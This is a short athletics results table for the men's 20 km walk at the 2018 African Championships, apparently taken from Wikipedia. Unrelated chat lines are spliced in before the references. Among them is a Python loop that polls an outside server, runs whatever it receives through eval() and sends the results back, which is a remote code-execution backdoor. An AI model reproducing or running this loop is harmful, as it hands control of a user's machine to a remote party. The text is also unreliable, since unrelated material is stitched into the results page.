2018 African Championships in Athletics – Men's 20 kilometres walk

Results

RankAthleteNationalityTimeNotes
Samuel Gathimba Kenya1:25:14
Lebogang Shange South Africa1:25:25
Hassanine Sebei Tunisia1:25:25
4Simon Wachira Kenya1:27:58
5Wayne Snyman South Africa1:28:16
6Mohamed Ameur Algeria1:28:38
7Tadilo Getu Ethiopia1:30:11
8Mohamed Ragab Egypt1:31:18
9Jérôme Caprice Mauritius1:33:28
10Biara Alem Ethiopia1:39:11
11Fatoyingo Gbenga Nigeria1:41:49
12Lawal Oluwaseyi Nigeria1:42:19
13Herve Nzossie Cameroon1:45:32
14Hichem Medjber Algeria1:50:04
Yohanis Algaw EthiopiaDNF
Mahmoud Awad EgyptDNF
gollark: Probably not?
gollark: Plus, unlike the old version, it only uses builtin python modules.
gollark: It's very secure.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```Using the new SPUDNET-HTTP API.
gollark: Make it continuously ping osmarks.net so you know what it's up to.

References

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.